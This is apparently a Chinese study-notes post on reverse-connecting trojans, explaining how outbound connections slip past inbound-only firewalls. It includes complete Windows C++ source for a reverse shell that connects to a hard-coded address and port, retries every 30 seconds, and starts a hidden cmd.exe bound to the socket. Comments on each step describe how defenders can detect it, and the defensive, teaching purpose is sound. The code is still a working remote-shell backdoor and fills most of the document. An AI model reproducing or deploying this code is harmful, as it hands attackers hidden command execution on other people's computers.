木马控制技术(一) -- 反弹木马

此为《木马技术揭秘与防御》系列读书笔记


原理比较简单:

“堡垒总是从内部被突破的”:木马运行在服务端(即被控主机)上,由它主动向外连接到指定ip、port的客户端(即控制端),而不是等待控制端连入

很多防火墙在默认配置下只过滤入站连接,对内部发起的连接请求无条件信任,因此这种反向连接可以绕过入站方向的ip包过滤规则;反过来说,出站(egress)过滤和对外连接的监控正是针对它的防御手段


 1 #include <iostream>
 2 #include <WINSOCK2.H>
 3 #pragma comment(lib,"ws2_32.lib")
 4 #pragma comment(lib,"advapi32.lib")
 5 #pragma comment(lib,"user32.lib")
 6 
 7 using namespace std;
 8 int main()
 9 {
       // Study sample of the reverse-connection pattern from the notes above:
       // the host running this program dials OUT to a fixed address, then starts
       // cmd.exe with its standard handles set to that socket. The comments
       // below describe each step and what a defender can observe there.
       // None of the WSAStartup / WSASocket / inet_addr results are checked.
10     WSAData wsaData;
11     SOCKET socket;
12     SOCKADDR_IN sockadd_in;
13 
       // Initialise Winsock (version 1.1 requested) and create a TCP/IPv4
       // stream socket.
14     WSAStartup(MAKEWORD(1,1),&wsaData);
15     socket = WSASocket(PF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0);
16 
       // Hard-coded remote endpoint; the address is in private (RFC 1918) space
       // in this sample. The explicit "\x00" is redundant, since a string
       // literal is already NUL-terminated.
17     char ip[] = "192.168.199.1\x00";
18     unsigned short port = 999;
19     
20     sockadd_in.sin_addr.s_addr = inet_addr(ip);
21     sockadd_in.sin_family  = AF_INET;
22     sockadd_in.sin_port = htons(port);
23 
       // connect() returns 0 on success, so the loop retries every 30 seconds
       // (Sleep(30000)) until the remote side accepts.
       // Detection: repeated outbound TCP attempts to one fixed address/port at
       // a regular interval are visible in firewall and flow logs. Egress
       // filtering that only allows expected destinations stops the sample here.
24     while(connect(socket,(struct sockaddr*)&sockadd_in,sizeof(sockadd_in))){
25         Sleep(30000);
26     }
27 
       // Start-up settings for the child process: window hidden (SW_HIDE) and
       // stdin, stdout and stderr all set to the socket handle.
28     STARTUPINFO si;
29     PROCESS_INFORMATION pi;
30     memset(&si,0,sizeof(si));
31     si.cb = sizeof(si);
32     si.dwFlags = STARTF_USESHOWWINDOW+STARTF_USESTDHANDLES;
33     si.wShowWindow = SW_HIDE;
34     si.hStdInput = si.hStdOutput = si.hStdError = (void*)socket;
       // Launches cmd.exe with bInheritHandles = TRUE so the child receives the
       // handles set above.
       // Detection: process-creation telemetry showing cmd.exe spawned by an
       // unexpected parent with no visible window, correlated with an outbound
       // connection from the same process tree.
35     if(!CreateProcess(NULL,"cmd.exe",NULL,NULL,TRUE,0,0,NULL,&si,&pi)){
36         cout<<"failed"<<endl;
           // Author's note below records error 998 (ERROR_NOACCESS), presumably
           // the value they saw when running this listing.
37         //998:ERROR_NOACCESS 
38         cout<<GetLastError()<<endl;
39     }
40 
       // main returns immediately: it neither waits on the child nor closes
       // pi's handles or the socket. The child may therefore outlive its parent,
       // so process-creation logs are what preserve the parent/child link.
41     return 0;
42 }